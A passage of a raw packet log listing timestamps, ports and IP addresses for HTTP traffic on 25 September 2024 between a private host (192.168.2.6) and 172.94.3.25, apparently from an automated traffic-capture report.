                                        Sep 25, 2024 18:40:29.206408978 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206420898 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206422091 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.206433058 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206442118 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.206444025 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206458092 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206461906 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.206470013 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206479073 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.206481934 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206492901 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206506968 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206509113 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.206517935 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206530094 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206538916 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.206543922 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206562042 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.206578970 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.410814047 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.415935040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.415954113 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.415967941 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.416009903 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.416739941 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.421705961 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.421756029 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.421770096 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.421828985 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.421834946 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.421842098 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.421854973 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.421869040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.421885014 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.421900988 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.422039032 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.422058105 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.422070026 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.422081947 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.422094107 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.422094107 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.422107935 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.422111988 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.422121048 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.422141075 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.422148943 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.422154903 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576224089 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576230049 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576248884 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576422930 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576435089 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576447010 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576455116 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576458931 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576472044 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576479912 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576483011 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576500893 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576504946 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576513052 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576524019 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576529980 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576535940 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576548100 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576555014 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576575994 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576579094 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576587915 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576598883 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576611996 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576617002 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576623917 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576636076 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576643944 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576647997 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576661110 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576668024 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576672077 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576685905 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576694012 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576698065 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576709986 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576718092 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576725006 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576736927 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576742887 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576750040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576764107 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576767921 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.576776981 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.576792002 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577025890 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577056885 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577156067 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577167988 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577179909 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577193975 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577202082 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577207088 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577223063 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577227116 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577235937 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577249050 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577251911 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577260971 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577274084 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577277899 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577295065 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577306032 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577308893 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577320099 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577337980 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577338934 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577352047 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577364922 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577370882 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577378035 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577390909 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577395916 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577403069 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577416897 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577424049 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577431917 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577445984 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577449083 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577466965 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577483892 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577826977 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577840090 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577853918 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577863932 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577867031 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577879906 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577883959 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577892065 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577904940 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577912092 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577924013 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577934980 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577946901 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577946901 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577961922 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577964067 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577984095 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.577989101 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.577996016 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578007936 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578021049 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578032970 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578035116 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578043938 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578057051 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578062057 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578069925 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578074932 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578082085 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578093052 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578104019 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578105927 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578119040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578130960 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578131914 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578145027 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578150988 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578185081 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578409910 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578421116 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578454018 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578583002 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578602076 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578613997 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578632116 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578634024 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578645945 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578663111 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578668118 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578681946 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578692913 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578694105 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578704119 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578716040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578722000 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578731060 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578743935 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578748941 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578758001 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578768969 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578773975 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578782082 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578794003 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578798056 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578807116 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578819990 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578823090 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578833103 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578845024 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578850985 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578857899 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578870058 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578875065 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578881979 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578895092 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578900099 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.578907013 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.578924894 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579271078 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579282999 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579302073 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579304934 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579313993 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579325914 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579333067 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579339981 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579354048 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579356909 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579366922 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579376936 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579396963 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579402924 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579411983 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579417944 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579437017 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579446077 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579448938 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579467058 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579479933 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579484940 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579493046 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579505920 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579509020 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579525948 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579534054 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579536915 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579547882 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579560041 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579566002 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579571962 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579585075 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579588890 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579598904 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579611063 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579615116 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579622984 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579636097 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579639912 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579648972 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579662085 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579664946 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579673052 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579685926 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579691887 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579696894 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579709053 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579716921 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.579720974 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.579741001 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580112934 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580126047 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580147982 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580270052 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580282927 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580295086 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580302954 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580307961 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580327988 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580327988 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580339909 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580351114 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580358982 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580363035 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580374956 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580383062 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580388069 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580399990 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580408096 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580414057 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580425978 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580434084 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580439091 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580451012 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580459118 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580486059 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580487967 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580498934 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580509901 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580522060 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580530882 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580534935 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580547094 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580554962 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580559015 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580571890 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580579996 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580584049 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580595970 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580604076 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580609083 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580621004 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580629110 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580635071 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580646992 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580653906 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580660105 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580672026 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580678940 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.580686092 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.580704927 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.581171036 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.581183910 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.581206083 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.931291103 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.931322098 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.931356907 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.931360960 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.931411028 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.931452036 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.931482077 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.931514978 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.931549072 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.931561947 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.931581020 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.931622982 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.931631088 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.931663036 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.931695938 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.931701899 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.931729078 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.931761026 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.931777000 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.931812048 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.931852102 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.931869984 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.931901932 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.931936026 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.931946039 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.931967974 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.931999922 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932009935 CEST4971680192.168.2.6172.94.3.25
